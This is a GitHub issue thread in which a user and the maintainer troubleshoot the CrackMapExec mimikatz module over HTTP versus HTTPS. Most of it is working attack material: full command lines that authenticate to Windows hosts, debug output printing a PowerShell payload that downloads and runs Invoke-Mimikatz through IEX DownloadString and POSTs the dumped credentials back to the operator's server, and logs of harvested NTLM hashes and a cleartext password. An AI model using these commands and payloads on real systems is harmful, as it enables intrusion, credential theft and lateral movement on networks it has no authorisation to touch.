byt3bl33d3r
commented
8 years ago Can you please give me the full output of the command you used with the --verbose flag?
Thanks!
Closed ghost closed 8 years ago
byt3bl33d3r
commented
8 years ago Can you please give me the full output of the command you used with the --verbose flag?
Thanks!
ghost
commented
8 years ago Yes, here it is.
$ sudo python crackmapexec.py 192.168.88.151 -u john -p 'doe' -m modules/credentials/mimikatz.py --server-port 80 --verbose
04-23-2016 00:16:33 CME 192.168.88.151:445 WIN8 [*] Windows 6.3 Build 9600 (name:WIN8) (domain:HACME)
04-23-2016 00:16:33 CME 192.168.88.151:445 WIN8 [+] HACME\john:doe (Pwn3d!)
04-23-2016 00:16:33 DEBUG Payload:
IEX (New-Object Net.WebClient).DownloadString('https://192.168.0.2:80/Invoke-Mimikatz.ps1');
$creds = Invoke-VugNMrUfey -Command 'privilege::debug sekurlsa::logonpasswords exit';
$request = [System.Net.WebRequest]::Create('https://192.168.0.2:80/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();
04-23-2016 00:16:33 DEBUG StringBinding: \\\\WIN8[\\PIPE\\atsvc]
04-23-2016 00:16:33 DEBUG StringBinding: win8[49154]
04-23-2016 00:16:33 DEBUG StringBinding: 192.168.88.151[49154]
04-23-2016 00:16:33 DEBUG StringBinding chosen: ncacn_ip_tcp:192.168.88.151[49154]
04-23-2016 00:16:34 MIMIKATZ 192.168.88.151:445 WIN8 [+] Executed payload
04-23-2016 00:16:34 MIMIKATZ [*] Waiting on 1 host(s)
04-23-2016 00:16:49 MIMIKATZ [*] Waiting on 1 host(s)I noticed that even specifying port 80 according to the debug it tries to go to https, even though removing the option (which defaults to 443) didn't help.
byt3bl33d3r
commented
8 years ago @fdiskyou just ran the same command and it works for me:
sudo python crackmapexec.py 192.168.0.12 -u Administrator -p 'P@ssw0rd' -m modules/credentials/mimikatz.py --server-port 80
04-22-2016 17:45:55 CME 192.168.0.12:445 WIN10BOX [*] Windows 10.0 Build 10586 (name:WIN10BOX) (domain:LAB)
04-22-2016 17:45:56 CME 192.168.0.12:445 WIN10BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
04-22-2016 17:45:56 MIMIKATZ 192.168.0.12:445 WIN10BOX [+] Executed payload
04-22-2016 17:45:56 MIMIKATZ [*] Waiting on 1 host(s)
04-22-2016 17:45:57 MIMIKATZ 192.168.0.12 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
04-22-2016 17:45:57 MIMIKATZ 192.168.0.12 [*] - - "POST / HTTP/1.1" 200 -
04-22-2016 17:45:57 MIMIKATZ 192.168.0.12 [*] Saved Mimikatz's output to Mimikatz-192.168.0.12-2016-04-22_174557.log
04-22-2016 17:46:00 [*] KTHXBYE!if you want to use a plain HTTP server you have to use the --server flag:
sudo python crackmapexec.py 192.168.0.12 -u Administrator -p 'P@ssw0rd' -m modules/credentials/mimikatz.py --server httpTry using a different execution method (e.g. the --exec-method flag)
P.S. Ran the same command on an actual Windows 8 box and works perfectly as well
sudo python crackmapexec.py 192.168.0.13 -u Administrator -p 'P@ssw0rd' -m modules/credentials/mimikatz.py --server-port 80
04-22-2016 17:50:39 CME 192.168.0.13:445 WIN8BOX [*] Windows 6.3 Build 9600 (name:WIN8BOX) (domain:LAB)
04-22-2016 17:50:39 CME 192.168.0.13:445 WIN8BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
04-22-2016 17:50:40 MIMIKATZ 192.168.0.13:445 WIN8BOX [+] Executed payload
04-22-2016 17:50:40 MIMIKATZ [*] Waiting on 1 host(s)
04-22-2016 17:50:41 MIMIKATZ 192.168.0.13 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
04-22-2016 17:50:46 MIMIKATZ 192.168.0.13 [*] - - "POST / HTTP/1.1" 200 -
04-22-2016 17:50:46 MIMIKATZ 192.168.0.13 [+] Found credentials in Mimikatz output (domain\username:password)
04-22-2016 17:50:46 MIMIKATZ 192.168.0.13 LAB\Administrator:e19ccf75ee54e06b06a5907af13cef42
04-22-2016 17:50:46 MIMIKATZ 192.168.0.13 LAB\WIN8BOX$:b169b69ab87ce321d68aafd79cf93d56
04-22-2016 17:50:46 MIMIKATZ 192.168.0.13 [*] Saved Mimikatz's output to Mimikatz-192.168.0.13-2016-04-22_175046.logOk, the --server http works. See bellow.
$ sudo python crackmapexec.py 192.168.88.151 -u john -p 'doe' -m modules/credentials/mimikatz.py --verbose --server http
04-23-2016 08:27:49 CME 192.168.88.151:445 WIN8 [*] Windows 6.3 Build 9600 (name:WIN8) (domain:HACME)
04-23-2016 08:27:49 CME 192.168.88.151:445 WIN8 [+] HACME\john:doe (Pwn3d!)
04-23-2016 08:27:49 DEBUG Payload:
IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.2:80/Invoke-Mimikatz.ps1');
$creds = Invoke-jxGRCyLUBf -Command 'privilege::debug sekurlsa::logonpasswords exit';
$request = [System.Net.WebRequest]::Create('http://192.168.0.2:80/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();
04-23-2016 08:27:50 DEBUG StringBinding: \\\\WIN8[\\PIPE\\atsvc]
04-23-2016 08:27:50 DEBUG StringBinding: win8[49154]
04-23-2016 08:27:50 DEBUG StringBinding: 192.168.88.151[49154]
04-23-2016 08:27:50 DEBUG StringBinding chosen: ncacn_ip_tcp:192.168.88.151[49154]
04-23-2016 08:27:50 MIMIKATZ 192.168.88.151:445 WIN8 [+] Executed payload
04-23-2016 08:27:50 MIMIKATZ [*] Waiting on 1 host(s)
04-23-2016 08:27:51 MIMIKATZ 192.168.88.151 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
04-23-2016 08:27:58 MIMIKATZ 192.168.88.151 [*] - - "POST / HTTP/1.1" 200 -
04-23-2016 08:27:58 MIMIKATZ 192.168.88.151 [+] Found credentials in Mimikatz output (domain\username:password)
04-23-2016 08:27:58 MIMIKATZ 192.168.88.151 HACME\Administrator:4f77309418a77ea1d42be5b4c4092546
04-23-2016 08:27:58 MIMIKATZ 192.168.88.151 HACME\WIN8$:bbdf644b3e6aa65cbe307d1246d3e4ed
04-23-2016 08:27:58 MIMIKATZ 192.168.88.151 HACME\Administrator:whatever
04-23-2016 08:27:58 MIMIKATZ 192.168.88.151 [*] Saved Mimikatz's output to Mimikatz-192.168.88.151-2016-04-23_082758.log
04-23-2016 08:28:05 [*] KTHXBYE!I'm wondering why the https didn't work though, my 443 was definetely your script and the communication was established. Anyway, thanks for your time. Cheers.
byt3bl33d3r
commented
8 years ago @fdiskyou probably something on your end. Closing since I can't reproduce this in anyway.
The HTTP server started by the mimikatz module doesn't seem to be working properly. I never get a GET request from the victim host. And yes, there's network connection between the hosts (L2), and no firewalls on. I can actually execute the powershell script successfully if I cd to data/PowerSploit/Exfiltration and do a "sudo python -m SimpleHTTPServer 80". Then on the client do a "IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit'" as in modules/credentials/mimikatz.py However I couldn't manage to dig what's wrong with the crackmapexec server, it starts, the tcp handshake happens but then it waits forever for a request that never happens.
Here's how I'm using the module: sudo python crackmapexec.py 192.168.88.151 -u john -p 'doe' -m modules/credentials/mimikatz.py --server-port 80